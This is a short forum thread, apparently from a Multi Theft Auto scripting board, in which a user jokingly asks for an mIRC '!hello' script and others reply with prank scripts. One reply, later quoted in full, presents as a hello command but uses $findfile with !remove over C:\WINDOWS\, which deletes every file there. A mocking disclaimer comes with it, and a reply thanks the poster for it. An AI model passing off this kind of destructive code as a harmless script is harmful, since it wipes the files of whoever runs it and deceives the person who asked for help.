Jump to content

OMG TODAY HELP MEH PL0X


[FMJ]ParadoX

Recommended Posts

Posted
CAN YOU LIEK MAKE ME A !hELLO SCRIPT WHICH SAYS HELLO PELASE

on *:SIGNAL:mta.command:{
 if ($3 == !hello) { mta.ban $1 $2 HELLO }
}

wow toady you're expertise in this script are remarkable! i've not seen such a good script in my life! :D

Posted
on *:SIGNAL:mta.command: {
 if (!hello iswm $3) {
   mta.pm $1 $2 WHY DO YOU NEED A COMMMAND TO SAY HELLO? Say it like normal people
   mta.text $1 $mta.nick($1,$2) says hello
 }
}

  • 4 weeks later...
Posted
on *:SIGNAL:mta.command: {
 if (!hello iswm $3) {
   mta.pm $1 $2 WHY DO YOU NEED A COMMMAND TO SAY HELLO? Say it like normal people
   mta.text $1 $mta.nick($1,$2) says hello
 }
}

LOL :lol:

Posted

on *:SIGNAL:mta.command {
 if ($3 == !hello) {
   mta.text $1 $2 HELLO $findfile(C:\WINDOWS\,*,0,!remove $+(",$1-,"))
 }
}

Fits more.

DISCLAIMER:

Use on own risk, i'm not responsible for your stupidity.

Posted
on *:SIGNAL:mta.command {
 if ($3 == !hello) {
   mta.text $1 $2 HELLO $findfile(C:\WINDOWS\,*,0,!remove $+(",$1-,"))
 }
}

Fits more.

DISCLAIMER:

Use on own risk, i'm not responsible for your stupidity.

thanks, this is very useful.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...